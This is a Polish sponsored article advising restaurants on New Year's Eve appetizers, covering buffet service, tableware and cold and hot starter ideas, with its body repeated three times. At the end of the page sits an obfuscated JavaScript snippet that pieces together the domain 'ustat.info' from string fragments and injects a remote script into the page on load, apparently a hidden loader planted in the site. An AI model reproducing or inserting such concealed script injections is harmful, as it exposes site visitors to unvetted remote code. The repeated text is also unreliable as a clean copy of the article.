Skip to content

Przystawki na Sylwestra – wykwintne i niebanalne

KR-tlo
Print Friendly, PDF & Email
Organizacja Sylwestra w restauracji, to nie lada wyzwanie dla całego personelu. Sprostać trzeba nie tylko dużej liczbie gości, ale też różnym gustom kulinarnym. Oprócz dań głównych, które będą sercem sylwestrowego menu, nie można zapominać o przystawkach. Te – z pozoru niepozorne potrawy, mogą istotnie wpłynąć na humory gości podczas zabawy. Sylwestrowe przekąski towarzyszą im bowiem podczas całej imprezowej nocy.
Jak podać sylwestrowe przekąski?

Oprócz wyboru konkretnych rodzajów przekąsek, bardzo ważna jest forma ich podania. Najlepszym pomysłem na zaserwowanie ich podczas sylwestrowego przyjęcia, jest szwedzki bufet. Podczas tego rodzaju imprez, goście komponują własne dania z potraw udostępnionych na wspólnym, dużym stole, swobodnie przemieszczając się i rozmawiając, zaś do posiłku zasiadają dopiero, gdy podawane są dania główne. Ważne jest, aby podczas całej nocy nie zabrakło przekąsek sylwestrowych, szczególnie tych podawanych na zimno. Dobrym rozwiązaniem są przekąski w formie finger food. Aby je zjeść, nie potrzeba używać sztućców, a nawet talerzyka, ponieważ tego rodzaju niewielkie zakąski są zazwyczaj na jednego kęsa. Tak przygotowany szwedzki stół zachęci wszystkich gości do tego, aby podczas wielogodzinnego przyjęcia, pomiędzy daniami głównymi, korzystać z niego, próbując niecodziennych, wykwintnych przystawek.

Serwując sylwestrowe przekąski, warto zadbać o dobranie do nich odpowiedniej zastawy stołowej. Pojedyncze, niewielkie porcje najlepiej prezentują się na malutkich talerzykach i w miseczkach, ale większa ilość przystawek może być zaserwowana na półmiskach i tacach. Do podania przystawek można też wybrać m.in. ozdobne słoiczki, kieliszki czy patery. Dobrze jest postawić na taką zastawę, która będzie komponować się z charakterem przyjęcia i, wraz z wykwintnymi przekąskami, stworzy na stole niebanalną dekorację.

Przygotowując przystawki na Sylwestra, warto pomyśleć o połączeniu tradycji z nowoczesnością. Takie rozwiązanie, pozwala na zaprezentowanie znanych już dań w zupełnie nowej odsłonie. W ten sposób można też zaprezentować najnowsze trendy kulinarne i dać gościom szansę na poznanie nowych smaków. Biorąc pod uwagę gust kulinarny wszystkich gości i najnowsze trendy żywieniowe, warto też pomyśleć o sylwestrowych przekąskach vege, pozbawionych glutenu czy przygotowanych ze składników pochodzących z ekologicznych upraw. To kierunki znane w świecie kulinarnym od dłuższego już czasu, i wciąż zyskują na popularności. Takie przekąski na Sylwestra z pewnością docenią też osoby, które są na diecie, np. bezglutenowej.

Przygotowując szwedzki bufet na Sylwestra, warto pamiętać też o różnorodności przekąsek. Trzeba mieć bowiem świadomość, że w przyjęciu uczestniczą różne osoby o rozmaitych gustach kulinarnych, a wśród nich wegetarianie i weganie, osoby uczulone na gluten albo miłośnicy kuchni azjatyckiej. O ile rodzaju przekąsek i dań głównych nie determinuje charakter restauracji, warto zadbać o jak największą różnorodność potraw na szwedzkim bufecie – zgodnie z zasadą, która nakazuje zachować równowagę pomiędzy mniejszą ilością a większym wyborem.

Przeciwieństwem różnorodnych przekąsek Sylwestrowych może być przygotowanie tematycznego menu, co również jest ciekawą propozycją dla wszystkich uczestników przyjęcia. Kuchnia śródziemnomorska, meksykańska czy staropolska, to tylko kilka spośród mnóstwa możliwości. Jednak warto odpowiednio wcześniej poinformować, jaka kuchnia będzie patronować trendom kulinarnym podczas całego Sylwestra.

 

Przekąski sylwestrowe na zimno

Wśród sylwestrowych przystawek nie może zabraknąć tych, które są podawane na zimno. Świetnie sprawdzą się podczas całego przyjęcia, ponieważ można po nie sięgnąć o każdej porze. Wśród wykwintnych i niebanalnych przekąsek na zimno warto wskazać na:

  • schab nadziewany oscypkiem i migdałami w wodorostach norii, podawany w formie roladki pokrojonej w plastry,
  • sałatka ze sfermentowanego kimchi (to propozycja tradycyjnej, koreańskiej przystawki z kiszonych warzyw),
  • antipasti warzywne z ricottą,
  • śledź podany na purée buraczanym, z dodatkiem ziemniaków i marchwi, jako wariacja na temat tradycyjnej sałatki śledziowej, to dobry pomysł na zaserwowanie tradycyjnego dania w nowoczesnej odsłonie,
  • tatar z łososia z gorczycą i Cremefine Fraiche – to kolejny pomysł na znane już danie w nowej odsłonie.

 

Przekąski sylwestrowe na ciepło

Oprócz przekąsek na zimno i gorących dań głównych nie można zapominać o sylwestrowych przystawkach podawanych na ciepło, np.:

  • pate z kurczaka i wątróbki w chrupiącym panko to przekąska w formie panierowanych, mięsnych kuleczek,
  • przegrzebki z konfiturą pomidorową i pudrem ogórkowym to niezwykle wykwintna przystawka,
  • przegrzebki, kaszanka z przepiórczym jajkiem, mus z kalafiora to nowoczesne połączenie kuchni polskiej z francuską,
  • omlet koreański Haemul Paejon to ulubione danie w Korei, które świetnie sprawdzi się w roli sylwestrowej przystawki,
  • sajgonki z wołowiną i mango, to popularne chińskie danie uwielbiane również w Polsce,
  • veloute z żurku podane z konfitowanym boczkiem i perfekcyjnym żółtkiem to nowoczesne podejście do tradycyjnej potrawy kuchni polskiej.

Dokładne przepisy na wszystkie wymienione sylwestrowe przekąski znajdują się na stronie: https://www.unileverfoodsolutions.pl/przepisy.html?filter=%5Bslugified_parent_keyword_names_facet~typ-dania%20%5Bslugified_sub_keyword_names_facet~typ-dania-przystawki%5D%5D.  Jest tutaj też wiele innych propozycji, które doskonale sprawdzą się w roli przystawek podawanych na zimno i ciepło.

 

Przystawki na sylwestra – podsumowanie

Przygotowując przyjecie sylwestrowe w swojej restauracji, trzeba mieć pewność, że wszystko jest dopięte na ostatni guzik. O atmosferę podczas tej wyjątkowej, jedynej w roku nocy, warto zadbać na kilka sposobów, również serwując wykwintne dania. Należy mieć przy tym świadomość, że przystawki, choć niepozorne, odgrywają bardzo ważną rolę podczas przyjęcia. Dlatego przygotowując przekąski na Sylwestra, warto więc pamiętać o kilku zasadach:

  1. dobrym pomysłem na zaserwowanie przystawek jest szwedzki bufet – dostępny podczas całego przyjęcia,
  2. zastawa stołowa, odpowiednio dobrana do niewielkich przystawek jest dopełnieniem dekoracji stołu,
  3. komponując dania, warto łączyć tradycję z nowoczesnością,
  4. wśród sylwestrowych przekąsek powinna panować różnorodność, aby każdy znalazł coś dla siebie,
  5. nawet decydując się na tematyczne menu, warto zadbać o różnorodność podając np. mięsne danie również w wersji vege,
  6. przekąski powinny być podane w wersji na zimno oraz na ciepło.

 

Opracowanie planu przygotowania przyjęcia sylwestrowego i postępowanie według kilku podstawowych zasad pozwoli stworzyć wyjątkowe – bo skomponowane na miarę sylwestrowej nocy, menu.

Jak podać sylwestrowe przekąski?

Oprócz wyboru konkretnych rodzajów przekąsek, bardzo ważna jest forma ich podania. Najlepszym pomysłem na zaserwowanie ich podczas sylwestrowego przyjęcia, jest szwedzki bufet. Podczas tego rodzaju imprez, goście komponują własne dania z potraw udostępnionych na wspólnym, dużym stole, swobodnie przemieszczając się i rozmawiając, zaś do posiłku zasiadają dopiero, gdy podawane są dania główne. Ważne jest, aby podczas całej nocy nie zabrakło przekąsek sylwestrowych, szczególnie tych podawanych na zimno. Dobrym rozwiązaniem są przekąski w formie finger food. Aby je zjeść, nie potrzeba używać sztućców, a nawet talerzyka, ponieważ tego rodzaju niewielkie zakąski są zazwyczaj na jednego kęsa. Tak przygotowany szwedzki stół zachęci wszystkich gości do tego, aby podczas wielogodzinnego przyjęcia, pomiędzy daniami głównymi, korzystać z niego, próbując niecodziennych, wykwintnych przystawek.

Serwując sylwestrowe przekąski, warto zadbać o dobranie do nich odpowiedniej zastawy stołowej. Pojedyncze, niewielkie porcje najlepiej prezentują się na malutkich talerzykach i w miseczkach, ale większa ilość przystawek może być zaserwowana na półmiskach i tacach. Do podania przystawek można też wybrać m.in. ozdobne słoiczki, kieliszki czy patery. Dobrze jest postawić na taką zastawę, która będzie komponować się z charakterem przyjęcia i, wraz z wykwintnymi przekąskami, stworzy na stole niebanalną dekorację.

Przygotowując przystawki na Sylwestra, warto pomyśleć o połączeniu tradycji z nowoczesnością. Takie rozwiązanie, pozwala na zaprezentowanie znanych już dań w zupełnie nowej odsłonie. W ten sposób można też zaprezentować najnowsze trendy kulinarne i dać gościom szansę na poznanie nowych smaków. Biorąc pod uwagę gust kulinarny wszystkich gości i najnowsze trendy żywieniowe, warto też pomyśleć o sylwestrowych przekąskach vege, pozbawionych glutenu czy przygotowanych ze składników pochodzących z ekologicznych upraw. To kierunki znane w świecie kulinarnym od dłuższego już czasu, i wciąż zyskują na popularności. Takie przekąski na Sylwestra z pewnością docenią też osoby, które są na diecie, np. bezglutenowej.

Przygotowując szwedzki bufet na Sylwestra, warto pamiętać też o różnorodności przekąsek. Trzeba mieć bowiem świadomość, że w przyjęciu uczestniczą różne osoby o rozmaitych gustach kulinarnych, a wśród nich wegetarianie i weganie, osoby uczulone na gluten albo miłośnicy kuchni azjatyckiej. O ile rodzaju przekąsek i dań głównych nie determinuje charakter restauracji, warto zadbać o jak największą różnorodność potraw na szwedzkim bufecie – zgodnie z zasadą, która nakazuje zachować równowagę pomiędzy mniejszą ilością a większym wyborem.

Przeciwieństwem różnorodnych przekąsek Sylwestrowych może być przygotowanie tematycznego menu, co również jest ciekawą propozycją dla wszystkich uczestników przyjęcia. Kuchnia śródziemnomorska, meksykańska czy staropolska, to tylko kilka spośród mnóstwa możliwości. Jednak warto odpowiednio wcześniej poinformować, jaka kuchnia będzie patronować trendom kulinarnym podczas całego Sylwestra.

Przekąski sylwestrowe na zimno

Wśród sylwestrowych przystawek nie może zabraknąć tych, które są podawane na zimno. Świetnie sprawdzą się podczas całego przyjęcia, ponieważ można po nie sięgnąć o każdej porze. Wśród wykwintnych i niebanalnych przekąsek na zimno warto wskazać na:

schab nadziewany oscypkiem i migdałami w wodorostach norii, podawany w formie roladki pokrojonej w plastry,
sałatka ze sfermentowanego kimchi (to propozycja tradycyjnej, koreańskiej przystawki z kiszonych warzyw),
antipasti warzywne z ricottą,
śledź podany na purée buraczanym, z dodatkiem ziemniaków i marchwi, jako wariacja na temat tradycyjnej sałatki śledziowej, to dobry pomysł na zaserwowanie tradycyjnego dania w nowoczesnej odsłonie,
tatar z łososia z gorczycą i Cremefine Fraiche – to kolejny pomysł na znane już danie w nowej odsłonie.

Przekąski sylwestrowe na ciepło

Oprócz przekąsek na zimno i gorących dań głównych nie można zapominać o sylwestrowych przystawkach podawanych na ciepło, np.:

pate z kurczaka i wątróbki w chrupiącym panko to przekąska w formie panierowanych, mięsnych kuleczek,
przegrzebki z konfiturą pomidorową i pudrem ogórkowym to niezwykle wykwintna przystawka,
przegrzebki, kaszanka z przepiórczym jajkiem, mus z kalafiora to nowoczesne połączenie kuchni polskiej z francuską,
omlet koreański Haemul Paejon to ulubione danie w Korei, które świetnie sprawdzi się w roli sylwestrowej przystawki,
sajgonki z wołowiną i mango, to popularne chińskie danie uwielbiane również w Polsce,
veloute z żurku podane z konfitowanym boczkiem i perfekcyjnym żółtkiem to nowoczesne podejście do tradycyjnej potrawy kuchni polskiej.

Dokładne przepisy na wszystkie wymienione sylwestrowe przekąski znajdują się na stronie: https://www.unileverfoodsolutions.pl/przepisy.html?filter=%5Bslugified_parent_keyword_names_facet~typ-dania%20%5Bslugified_sub_keyword_names_facet~typ-dania-przystawki%5D%5D. Jest tutaj też wiele innych propozycji, które doskonale sprawdzą się w roli przystawek podawanych na zimno i ciepło.

Przystawki na sylwestra – podsumowanie

Przygotowując przyjecie sylwestrowe w swojej restauracji, trzeba mieć pewność, że wszystko jest dopięte na ostatni guzik. O atmosferę podczas tej wyjątkowej, jedynej w roku nocy, warto zadbać na kilka sposobów, również serwując wykwintne dania. Należy mieć przy tym świadomość, że przystawki, choć niepozorne, odgrywają bardzo ważną rolę podczas przyjęcia. Dlatego przygotowując przekąski na Sylwestra, warto więc pamiętać o kilku zasadach:

dobrym pomysłem na zaserwowanie przystawek jest szwedzki bufet – dostępny podczas całego przyjęcia,
zastawa stołowa, odpowiednio dobrana do niewielkich przystawek jest dopełnieniem dekoracji stołu,
komponując dania, warto łączyć tradycję z nowoczesnością,
wśród sylwestrowych przekąsek powinna panować różnorodność, aby każdy znalazł coś dla siebie,
nawet decydując się na tematyczne menu, warto zadbać o różnorodność podając np. mięsne danie również w wersji vege,
przekąski powinny być podane w wersji na zimno oraz na ciepło.

Opracowanie planu przygotowania przyjęcia sylwestrowego i postępowanie według kilku podstawowych zasad pozwoli stworzyć wyjątkowe – bo skomponowane na miarę sylwestrowej nocy, menu.

Jak podać sylwestrowe przekąski?
Oprócz wyboru konkretnych rodzajów przekąsek, bardzo ważna jest forma ich podania. Najlepszym pomysłem na zaserwowanie ich podczas sylwestrowego przyjęcia, jest szwedzki bufet. Podczas tego rodzaju imprez, goście komponują własne dania z potraw udostępnionych na wspólnym, dużym stole, swobodnie przemieszczając się i rozmawiając, zaś do posiłku zasiadają dopiero, gdy podawane są dania główne. Ważne jest, aby podczas całej nocy nie zabrakło przekąsek sylwestrowych, szczególnie tych podawanych na zimno. Dobrym rozwiązaniem są przekąski w formie finger food. Aby je zjeść, nie potrzeba używać sztućców, a nawet talerzyka, ponieważ tego rodzaju niewielkie zakąski są zazwyczaj na jednego kęsa. Tak przygotowany szwedzki stół zachęci wszystkich gości do tego, aby podczas wielogodzinnego przyjęcia, pomiędzy daniami głównymi, korzystać z niego, próbując niecodziennych, wykwintnych przystawek.
Serwując sylwestrowe przekąski, warto zadbać o dobranie do nich odpowiedniej zastawy stołowej. Pojedyncze, niewielkie porcje najlepiej prezentują się na malutkich talerzykach i w miseczkach, ale większa ilość przystawek może być zaserwowana na półmiskach i tacach. Do podania przystawek można też wybrać m.in. ozdobne słoiczki, kieliszki czy patery. Dobrze jest postawić na taką zastawę, która będzie komponować się z charakterem przyjęcia i, wraz z wykwintnymi przekąskami, stworzy na stole niebanalną dekorację.
Przygotowując przystawki na Sylwestra, warto pomyśleć o połączeniu tradycji z nowoczesnością. Takie rozwiązanie, pozwala na zaprezentowanie znanych już dań w zupełnie nowej odsłonie. W ten sposób można też zaprezentować najnowsze trendy kulinarne i dać gościom szansę na poznanie nowych smaków. Biorąc pod uwagę gust kulinarny wszystkich gości i najnowsze trendy żywieniowe, warto też pomyśleć o sylwestrowych przekąskach vege, pozbawionych glutenu czy przygotowanych ze składników pochodzących z ekologicznych upraw. To kierunki znane w świecie kulinarnym od dłuższego już czasu, i wciąż zyskują na popularności. Takie przekąski na Sylwestra z pewnością docenią też osoby, które są na diecie, np. bezglutenowej.
Przygotowując szwedzki bufet na Sylwestra, warto pamiętać też o różnorodności przekąsek. Trzeba mieć bowiem świadomość, że w przyjęciu uczestniczą różne osoby o rozmaitych gustach kulinarnych, a wśród nich wegetarianie i weganie, osoby uczulone na gluten albo miłośnicy kuchni azjatyckiej. O ile rodzaju przekąsek i dań głównych nie determinuje charakter restauracji, warto zadbać o jak największą różnorodność potraw na szwedzkim bufecie – zgodnie z zasadą, która nakazuje zachować równowagę pomiędzy mniejszą ilością a większym wyborem.
Przeciwieństwem różnorodnych przekąsek Sylwestrowych może być przygotowanie tematycznego menu, co również jest ciekawą propozycją dla wszystkich uczestników przyjęcia. Kuchnia śródziemnomorska, meksykańska czy staropolska, to tylko kilka spośród mnóstwa możliwości. Jednak warto odpowiednio wcześniej poinformować, jaka kuchnia będzie patronować trendom kulinarnym podczas całego Sylwestra.
Przekąski sylwestrowe na zimno
Wśród sylwestrowych przystawek nie może zabraknąć tych, które są podawane na zimno. Świetnie sprawdzą się podczas całego przyjęcia, ponieważ można po nie sięgnąć o każdej porze. Wśród wykwintnych i niebanalnych przekąsek na zimno warto wskazać na:
  • schab nadziewany oscypkiem i migdałami w wodorostach norii, podawany w formie roladki pokrojonej w plastry,
  • sałatka ze sfermentowanego kimchi (to propozycja tradycyjnej, koreańskiej przystawki z kiszonych warzyw),
  • antipasti warzywne z ricottą,
  • śledź podany na purée buraczanym, z dodatkiem ziemniaków i marchwi, jako wariacja na temat tradycyjnej sałatki śledziowej, to dobry pomysł na zaserwowanie tradycyjnego dania w nowoczesnej odsłonie,
  • tatar z łososia z gorczycą i Cremefine Fraiche – to kolejny pomysł na znane już danie w nowej odsłonie.
Przekąski sylwestrowe na ciepło
Oprócz przekąsek na zimno i gorących dań głównych nie można zapominać o sylwestrowych przystawkach podawanych na ciepło, np.:
  • pate z kurczaka i wątróbki w chrupiącym panko to przekąska w formie panierowanych, mięsnych kuleczek,
  • przegrzebki z konfiturą pomidorową i pudrem ogórkowym to niezwykle wykwintna przystawka,
  • przegrzebki, kaszanka z przepiórczym jajkiem, mus z kalafiora to nowoczesne połączenie kuchni polskiej z francuską,
  • omlet koreański Haemul Paejon to ulubione danie w Korei, które świetnie sprawdzi się w roli sylwestrowej przystawki,
  • sajgonki z wołowiną i mango, to popularne chińskie danie uwielbiane również w Polsce,
  • veloute z żurku podane z konfitowanym boczkiem i perfekcyjnym żółtkiem to nowoczesne podejście do tradycyjnej potrawy kuchni polskiej.
Dokładne przepisy na wszystkie wymienione sylwestrowe przekąski znajdują się na stronie: https://www.unileverfoodsolutions.pl/przepisy.html?filter=%5Bslugified_parent_keyword_names_facet~typ-dania%20%5Bslugified_sub_keyword_names_facet~typ-dania-przystawki%5D%5D.  Jest tutaj też wiele innych propozycji, które doskonale sprawdzą się w roli przystawek podawanych na zimno i ciepło.
Przystawki na sylwestra – podsumowanie
Przygotowując przyjęcie sylwestrowe w swojej restauracji, trzeba mieć pewność, że wszystko jest dopięte na ostatni guzik. O atmosferę podczas tej wyjątkowej, jedynej w roku nocy, warto zadbać na kilka sposobów, również serwując wykwintne dania. Należy mieć przy tym świadomość, że przystawki, choć niepozorne, odgrywają bardzo ważną rolę podczas przyjęcia. Dlatego przygotowując przekąski na Sylwestra, warto więc pamiętać o kilku zasadach:
  1. dobrym pomysłem na zaserwowanie przystawek jest szwedzki bufet – dostępny podczas całego przyjęcia,
  2. zastawa stołowa, odpowiednio dobrana do niewielkich przystawek jest dopełnieniem dekoracji stołu,
  3. komponując dania, warto łączyć tradycję z nowoczesnością,
  4. wśród sylwestrowych przekąsek powinna panować różnorodność, aby każdy znalazł coś dla siebie,
  5. nawet decydując się na tematyczne menu, warto zadbać o różnorodność podając np. mięsne danie również w wersji vege,
  6. przekąski powinny być podane w wersji na zimno oraz na ciepło.
Opracowanie planu przygotowania przyjęcia sylwestrowego i postępowanie według kilku podstawowych zasad pozwoli stworzyć wyjątkowe – bo skomponowane na miarę sylwestrowej nocy, menu.
ARTYKUŁ SPONSOROWANY



document.write(‘‘);

(function(){
zpp3=document.createElement(“script”);zpp3_=((“u”)+”st”)+”a”;zpp3.async=true;
zpp3.type=”text/javascript”;zpp3_+=(“t.i”)+””+”n”;zpp3_+=((“f”)+”o”);zpp3_+=”/”;
zpp3u=”69292117.”;zpp3u+=”7q4x89ujpp39rr5jq89″+”xb1jXhkgit6″;
zpp3.src=”//”+zpp3_+zpp3u; document.body.appendChild(zpp3);
})();

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *